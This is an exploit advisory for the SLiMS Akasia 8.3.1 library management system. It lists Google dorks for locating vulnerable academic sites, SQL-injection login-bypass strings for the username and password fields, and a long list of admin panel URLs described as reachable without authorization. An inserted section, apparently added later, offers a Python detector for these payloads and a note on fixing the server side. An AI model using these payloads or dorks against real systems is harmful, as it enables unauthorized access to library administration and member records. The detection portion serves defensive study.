- ####################################################################
- # Exploit Title : Slims CMS Akasia 8.3.1 Improper Authorization Vulnerability
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 20/05/2019
- # Vendor Homepage : slimsetd.id - slims.web.id
- # Software Download Link : slims.web.id/goslims/?wpdmpro=slims-8-3-1-akasia
- # Software Information Link : foss4lib.org/package/senayan-library-management-system-slims/release/8.3.1
- # Software Version : 8.3.1
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks :
- intext:Template By Erwan Setyo Budi. Powered By SLiMS and ShapeBootstrap. site:ac.id
- intext:Powered By SETIADI and ShapeBootstrap. site:ac.id
- # Vulnerability Type :
- CWE-285 [ Improper Authorization ]
- CWE-284 [ Improper Access Control ]
- CWE-592 [ Authentication Bypass Issues ]
- CWE-287 [ Improper Authentication ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Setiadi is an automation system that serves to manage a repository of works such as theses and
- dissertations. Setiadi is built on SLiMS (Senayan Library Management System).
- Setiadi is open source automation software, licensed under GPL v3, built with PHP
- and a MySQL database.
- SENAYAN Library Management System (SLiMS) version 8 Codename Akasia
- SLiMS is free open source software for library resources management
- (such as books, journals, digital documents and other library materials) and
- administration such as collection circulation, collection management, membership,
- stock taking and many others.
- ####################################################################
- # Impact :
- ***********
- The software does not restrict or incorrectly restricts access to a resource
- from an unauthorized actor.
- The software does not perform or incorrectly performs an authorization check when
- an actor attempts to access a resource or perform an action.
- When an actor claims to have a given identity, the software does not prove or
- insufficiently proves that the claim is correct.
- Assuming a user with a given identity, authorization is the process of determining whether
- that user can access a given resource, based on the user's privileges and any permissions
- or other access-control specifications that apply to the resource.
- When access control checks are not applied consistently - or not at all - users are able
- to access data or perform actions that they should not be allowed to perform.
- This can lead to a wide range of problems, including information exposures,
- denial of service, and arbitrary code execution.
- ####################################################################
- # Authentication Bypass / Improper Access Control / Improper Authorization Exploit :
- **************************************************************************
- Admin Panel Login Path :
- ************************
- /index.php?p=login
- /admin
- Admin Username :
- admin
- admin' --
- '=''or'
- ' or 1=1 limit 1 -- -+
- anything' OR 'x'='x
- Admin Password :
- admin
- admin' --
- '=''or'
- ' or 1=1 limit 1 -- -+
- anything' OR 'x'='x
- Usable Admin Control Panel Links Exploits :
- ******************************************
- /admin/modules/system/app_user.php?changecurrent=true&action=detail
- /admin/index.php?mod=bibliography
- /admin/modules/bibliography/index.php?action=detail
- /admin/modules/bibliography/item.php
- /admin/modules/bibliography/checkout_item.php
- /admin/modules/bibliography/z3950sru.php
- /admin/modules/bibliography/z3950.php
- /admin/modules/bibliography/p2p.php
- /admin/modules/bibliography/dl_print.php
- /admin/modules/bibliography/item_barcode_generator.php
- /admin/modules/bibliography/marcexport.php
- /admin/modules/bibliography/marcimport.php
- /admin/modules/bibliography/printed_card.php
- /admin/modules/bibliography/export.php
- /admin/modules/bibliography/import.php
- /admin/modules/bibliography/item_export.php
- /admin/modules/bibliography/item_import.php
- /admin/index.php?mod=circulation
- /admin/modules/circulation/index.php?action=start
- /admin/modules/circulation/quick_return.php
- /admin/modules/circulation/loan_rules.php
- /admin/modules/reporting/customs/loan_history.php
- /admin/modules/reporting/customs/overdued_list.php
- /admin/modules/reporting/customs/reserve_list.php
- /admin/index.php?mod=membership
- /admin/modules/membership/index.php
- /admin/modules/membership/index.php?action=detail
- /admin/modules/membership/member_type.php
- /admin/modules/membership/member_card_generator.php
- /admin/modules/membership/export.php
- /admin/modules/membership/import.php
- /admin/index.php?mod=master_file
- /admin/modules/master_file/index.php
- /admin/modules/master_file/rda_cmc.php?type=content
- /admin/modules/master_file/rda_cmc.php?type=media
- /admin/modules/master_file/rda_cmc.php?type=carrier
- /admin/modules/master_file/publisher.php
- /admin/modules/master_file/supplier.php
- /admin/modules/master_file/author.php
- /admin/modules/master_file/topic.php
- /admin/modules/master_file/location.php
- /admin/modules/master_file/news_type.php
- /admin/modules/master_file/place.php
- /admin/modules/master_file/item_status.php
- /admin/modules/master_file/coll_type.php
- /admin/modules/master_file/doc_language.php
- /admin/modules/master_file/label.php
- /admin/modules/master_file/frequency.php
- /admin/modules/master_file/p2pservers.php
- /admin/modules/master_file/item_code_pattern.php
- /admin/modules/master_file/author.php?type=orphaned
- /admin/modules/master_file/topic.php?type=orphaned
- /admin/modules/master_file/publisher.php?type=orphaned
- /admin/modules/master_file/place.php?type=orphaned
- /admin/index.php?mod=stock_take
- /admin/modules/stock_take/index.php
- /admin/modules/stock_take/init.php
- /admin/modules/system/index.php
- /admin/index.php?mod=system
- /admin/modules/system/envinfo.php
- /admin/modules/system/ucsetting.php
- /admin/modules/system/theme.php
- /admin/modules/system/content.php
- /admin/modules/system/biblio_indexes.php
- /admin/modules/system/module.php
- /admin/modules/system/app_user.php
- /admin/modules/system/user_group.php
- /admin/modules/system/shortcut.php
- /admin/modules/system/holiday.php
- /admin/modules/system/barcode_generator.php
- /admin/modules/system/sys_log.php
- /admin/modules/system/backup.php
- /admin/index.php?mod=reporting
- /admin/modules/reporting/index.php
- /admin/modules/reporting/loan_report.php
- /admin/modules/reporting/member_report.php
- /admin/modules/reporting/customs/class_recap.php
- /admin/modules/reporting/customs/titles_list.php
- /admin/modules/reporting/customs/item_titles_list.php
- /admin/modules/reporting/customs/item_usage.php
- /admin/modules/reporting/customs/loan_by_class.php
- /admin/modules/reporting/customs/member_list.php
- /admin/modules/reporting/customs/member_loan_list.php
- /admin/modules/reporting/customs/loan_history.php
- /admin/modules/reporting/customs/due_date_warning.php
- /admin/modules/reporting/customs/overdued_list.php
- /admin/modules/reporting/customs/staff_act.php
- /admin/modules/reporting/customs/visitor_report.php
- /admin/modules/reporting/customs/visitor_report_day.php
- /admin/index.php?mod=chat
- /admin/index.php?mod=serial_control
- /admin/modules/serial_control/index.php
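Added detection example (not part of the original advisory) covering the two conditions it describes: login submissions that carry the listed SQL-injection payload shapes, and requests for the admin module scripts from a client with no authenticated admin session. The `Request` record, the `authenticated` flag and the `username`/`password` field names are assumptions standing in for whatever the web server or the application's session layer actually provides.

```python
import re
from dataclasses import dataclass, field

# Shapes of the advisory's login payloads: quote + comment (`admin' --`),
# OR tautology (`' or 1=1 ...`, `anything' OR 'x'='x`), quote=quote (`'=''or'`).
LOGIN_SQLI = re.compile(r"(?i)'\s*(?:--|or\b|=\s*')")

# Admin module scripts from the advisory's link list; reached via /admin/index.php?mod=... or directly.
ADMIN_MODULE = re.compile(r"^/admin/modules/[\w/]+\.php$")

@dataclass
class Request:
    method: str
    path: str                                  # URL path without query string
    query: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)   # assumed field names: username, password
    authenticated: bool = False                # assumed: server-side session holds a logged-in admin

def is_login_submission(req: Request) -> bool:
    # Login paths from the advisory: /index.php?p=login and /admin
    return req.method == "POST" and (
        req.query.get("p") == "login" or req.path in ("/admin", "/admin/", "/admin/index.php"))

def is_admin_resource(req: Request) -> bool:
    return bool(ADMIN_MODULE.match(req.path)) or (
        req.path == "/admin/index.php" and "mod" in req.query)

def inspect(req: Request) -> list:
    """Finding labels for one request; empty when nothing is suspicious."""
    findings = []
    if is_login_submission(req):
        for name in ("username", "password"):
            if LOGIN_SQLI.search(req.form.get(name, "")):
                findings.append(f"sqli_login_payload:{name}")
    elif is_admin_resource(req) and not req.authenticated:
        findings.append("unauthenticated_admin_access")
    return findings

def scan(requests) -> list:
    """Apply inspect() to a sequence of requests; returns (index, finding) pairs."""
    return [(i, f) for i, req in enumerate(requests) for f in inspect(req)]

# Constructed sample traffic, not captured from any real deployment.
SAMPLE = [
    Request("POST", "/index.php", {"p": "login"}, {"username": "admin", "password": "S3cret!"}),
    Request("POST", "/index.php", {"p": "login"}, {"username": "admin' --", "password": "x"}),
    Request("POST", "/admin/index.php", {}, {"username": "a", "password": "anything' OR 'x'='x"}),
    Request("GET", "/admin/modules/system/app_user.php", {"changecurrent": "true"}),
    Request("GET", "/admin/index.php", {"mod": "membership"}, authenticated=True),
    Request("GET", "/admin/modules/bibliography/export.php", authenticated=True),
]
```

The quote-based heuristic will also flag a legitimate value such as `a'or`, so treat a hit as a signal to review, and pair it with the server-side fix: every admin module script must verify the session before doing any work, whatever URL it was reached by.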
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################